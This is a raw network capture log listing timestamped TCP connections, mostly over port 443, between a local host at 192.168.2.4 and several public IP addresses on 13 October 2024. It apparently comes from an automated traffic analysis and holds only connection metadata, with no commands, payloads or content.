                                                  Oct 13, 2024 19:33:28.982894897 CEST44349776104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:28.982933998 CEST49776443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:28.983715057 CEST49776443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:28.983726025 CEST44349776104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019148111 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019273043 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019323111 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019330978 CEST49779443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.019340992 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019378901 CEST49779443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.019387960 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019428968 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019474030 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019480944 CEST49779443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.019485950 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019510984 CEST49779443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.019519091 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019606113 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.019670963 CEST49779443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.019676924 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.073246956 CEST49779443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.073252916 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.111593962 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.111692905 CEST49779443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.111715078 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.111762047 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.111819029 CEST49779443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.111939907 CEST49779443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.111951113 CEST44349779104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.259433031 CEST44349782172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:29.259911060 CEST49782443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:29.259977102 CEST44349782172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:29.260351896 CEST44349782172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:29.263484955 CEST49782443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:29.263613939 CEST44349782172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:29.263901949 CEST49782443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:29.307446003 CEST44349782172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:29.412000895 CEST44349782172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:29.412117958 CEST44349782172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:29.412200928 CEST49782443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:29.449080944 CEST44349781184.28.90.27192.168.2.4
                                                  Oct 13, 2024 19:33:29.449218988 CEST49781443192.168.2.4184.28.90.27
                                                  Oct 13, 2024 19:33:29.491736889 CEST49781443192.168.2.4184.28.90.27
                                                  Oct 13, 2024 19:33:29.491811991 CEST44349781184.28.90.27192.168.2.4
                                                  Oct 13, 2024 19:33:29.492213011 CEST44349781184.28.90.27192.168.2.4
                                                  Oct 13, 2024 19:33:29.493168116 CEST49781443192.168.2.4184.28.90.27
                                                  Oct 13, 2024 19:33:29.535444021 CEST44349781184.28.90.27192.168.2.4
                                                  Oct 13, 2024 19:33:29.645309925 CEST49782443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:29.645380020 CEST44349782172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:29.687618971 CEST49784443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:29.687700987 CEST44349784172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:29.687853098 CEST49784443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:29.688432932 CEST49784443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:29.688466072 CEST44349784172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:29.691231012 CEST49785443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.691329956 CEST44349785104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.691497087 CEST49785443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.691802979 CEST49785443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:29.691842079 CEST44349785104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:29.801357985 CEST44349781184.28.90.27192.168.2.4
                                                  Oct 13, 2024 19:33:29.801440001 CEST44349781184.28.90.27192.168.2.4
                                                  Oct 13, 2024 19:33:29.801513910 CEST49781443192.168.2.4184.28.90.27
                                                  Oct 13, 2024 19:33:29.802176952 CEST49781443192.168.2.4184.28.90.27
                                                  Oct 13, 2024 19:33:29.802176952 CEST49781443192.168.2.4184.28.90.27
                                                  Oct 13, 2024 19:33:29.802225113 CEST44349781184.28.90.27192.168.2.4
                                                  Oct 13, 2024 19:33:29.802253008 CEST44349781184.28.90.27192.168.2.4
                                                  Oct 13, 2024 19:33:30.159132957 CEST44349784172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.159579039 CEST49784443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.159647942 CEST44349784172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.160666943 CEST44349784172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.160743952 CEST49784443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.161375046 CEST49784443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.161375046 CEST49784443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.161422014 CEST49784443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.161456108 CEST44349784172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.161562920 CEST49784443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.161942959 CEST49786443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.161983013 CEST44349786172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.162054062 CEST49786443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.162378073 CEST49786443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.162389994 CEST44349786172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.164803028 CEST44349785104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:30.166790009 CEST49785443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:30.166855097 CEST44349785104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:30.168204069 CEST44349785104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:30.168601990 CEST49785443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:30.168745995 CEST49785443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:30.168786049 CEST44349785104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:30.216932058 CEST49785443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:30.293909073 CEST44349785104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:30.294106960 CEST44349785104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:30.294212103 CEST49785443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:30.297317982 CEST49785443192.168.2.4104.21.61.83
                                                  Oct 13, 2024 19:33:30.297342062 CEST44349785104.21.61.83192.168.2.4
                                                  Oct 13, 2024 19:33:30.648487091 CEST44349786172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.648757935 CEST49786443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.648772955 CEST44349786172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.649753094 CEST44349786172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.649811983 CEST49786443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.650255919 CEST49786443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.650300980 CEST44349786172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.650501966 CEST49786443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:30.650507927 CEST44349786172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:30.703711033 CEST49786443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:31.048955917 CEST44349786172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:31.049052954 CEST44349786172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:31.049114943 CEST49786443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:31.051469088 CEST49786443192.168.2.4172.67.207.178
                                                  Oct 13, 2024 19:33:31.051484108 CEST44349786172.67.207.178192.168.2.4
                                                  Oct 13, 2024 19:33:31.059988022 CEST49787443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.060013056 CEST4434978735.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.060123920 CEST49787443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.060513973 CEST49787443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.060523987 CEST4434978735.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.689671040 CEST4434978735.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.690395117 CEST49787443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.690418005 CEST4434978735.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.691440105 CEST4434978735.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.691498995 CEST49787443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.696650028 CEST49787443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.696793079 CEST4434978735.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.697359085 CEST49787443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.697365999 CEST4434978735.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.744573116 CEST49787443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.827984095 CEST4434978735.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.828185081 CEST4434978735.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.828371048 CEST49787443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.977099895 CEST49787443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.977134943 CEST4434978735.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.982187033 CEST49788443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:31.982250929 CEST4434978835.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:31.982331038 CEST49788443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:32.124466896 CEST49788443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:32.124547005 CEST4434978835.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:32.617526054 CEST4434978835.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:32.617980003 CEST49788443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:32.618005037 CEST4434978835.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:32.618376017 CEST4434978835.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:32.619441986 CEST49788443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:32.619643927 CEST4434978835.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:32.623536110 CEST49788443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:32.671446085 CEST4434978835.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:32.756819010 CEST4434978835.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:32.757122040 CEST4434978835.190.80.1192.168.2.4
                                                  Oct 13, 2024 19:33:32.757266998 CEST49788443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:32.757267952 CEST49788443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:32.757267952 CEST49788443192.168.2.435.190.80.1
                                                  Oct 13, 2024 19:33:34.080971956 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:34.081008911 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:34.081093073 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:34.082308054 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:34.082320929 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:34.905877113 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:34.905946970 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:34.908865929 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:34.908876896 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:34.909177065 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:34.963295937 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:35.648633957 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:35.695401907 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:35.918499947 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:35.918565989 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:35.918586016 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:35.918627977 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:35.918642998 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:35.918667078 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:35.918673038 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:35.918682098 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:35.918685913 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:35.918714046 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:35.918736935 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:35.918931961 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:35.918994904 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:35.918998957 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:35.919234991 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:35.919290066 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:36.608834982 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:36.608834982 CEST49789443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:33:36.608867884 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:36.608881950 CEST4434978952.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:33:37.417948008 CEST44349756172.217.18.4192.168.2.4
                                                  Oct 13, 2024 19:33:37.418040037 CEST44349756172.217.18.4192.168.2.4
                                                  Oct 13, 2024 19:33:37.418107986 CEST49756443192.168.2.4172.217.18.4
                                                  Oct 13, 2024 19:33:37.871762037 CEST4972380192.168.2.493.184.221.240
                                                  Oct 13, 2024 19:33:37.877105951 CEST804972393.184.221.240192.168.2.4
                                                  Oct 13, 2024 19:33:37.877173901 CEST4972380192.168.2.493.184.221.240
                                                  Oct 13, 2024 19:33:39.105911970 CEST49756443192.168.2.4172.217.18.4
                                                  Oct 13, 2024 19:33:39.105986118 CEST44349756172.217.18.4192.168.2.4
                                                  Oct 13, 2024 19:34:13.367954969 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:13.368058920 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:13.368149996 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:13.368664980 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:13.368702888 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.171523094 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.171596050 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.174760103 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.174807072 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.175319910 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.183794022 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.227448940 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.508052111 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.508125067 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.508172035 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.508214951 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.508295059 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.508339882 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.508364916 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.508980989 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.509049892 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.509079933 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.509097099 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.509125948 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.509244919 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.509296894 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.517811060 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.517833948 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:14.517949104 CEST49795443192.168.2.452.149.20.212
                                                  Oct 13, 2024 19:34:14.517956018 CEST4434979552.149.20.212192.168.2.4
                                                  Oct 13, 2024 19:34:15.369515896 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:15.369565010 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:15.369781971 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:15.370523930 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:15.370542049 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.086415052 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.086761951 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.088190079 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.088201046 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.088660955 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.096699953 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.143399954 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.200092077 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.200167894 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.200216055 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.200232983 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.200248957 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.200310946 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.200310946 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.291372061 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.291460991 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.291579962 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.291579962 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.291593075 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.291677952 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.293414116 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.293474913 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.293499947 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.293508053 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.293550968 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.293550968 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.383754015 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.383804083 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.383847952 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.383877039 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.383877039 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.383991957 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.384293079 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.384339094 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.384387016 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.384393930 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.384485006 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.384485006 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.385071993 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.385113001 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.385159016 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.385166883 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.385200024 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.385200024 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.386317968 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.386360884 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.386434078 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.386434078 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.386468887 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.386791945 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.480356932 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.480402946 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.480441093 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.480462074 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.480484962 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.480500937 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.480667114 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.480714083 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.480732918 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.480746031 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.480771065 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.480782986 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.481057882 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.481117010 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.481122017 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.481129885 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.481174946 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.481731892 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.481775045 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.481796980 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.481805086 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.481828928 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.481847048 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.486294985 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.486337900 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.486360073 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.486372948 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.486399889 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.486416101 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.486599922 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.486660004 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.486660004 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.486692905 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.486715078 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.486738920 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.520942926 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.521012068 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.521032095 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.521096945 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.521105051 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.521128893 CEST49796443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.521140099 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.521157980 CEST4434979613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.569118023 CEST49798443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.569200039 CEST4434979813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.569214106 CEST49797443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.569221020 CEST4434979713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.569271088 CEST49798443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.569303989 CEST49797443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.569940090 CEST49798443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.569962025 CEST4434979813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.570041895 CEST49797443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.570055008 CEST4434979713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.571894884 CEST49799443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.571938038 CEST4434979913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.572047949 CEST49799443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.572221041 CEST49799443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.572237015 CEST4434979913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.574210882 CEST49800443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.574254036 CEST4434980013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:16.574332952 CEST49800443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:16.575429916 CEST49801443192.168.2.413.107.246.45
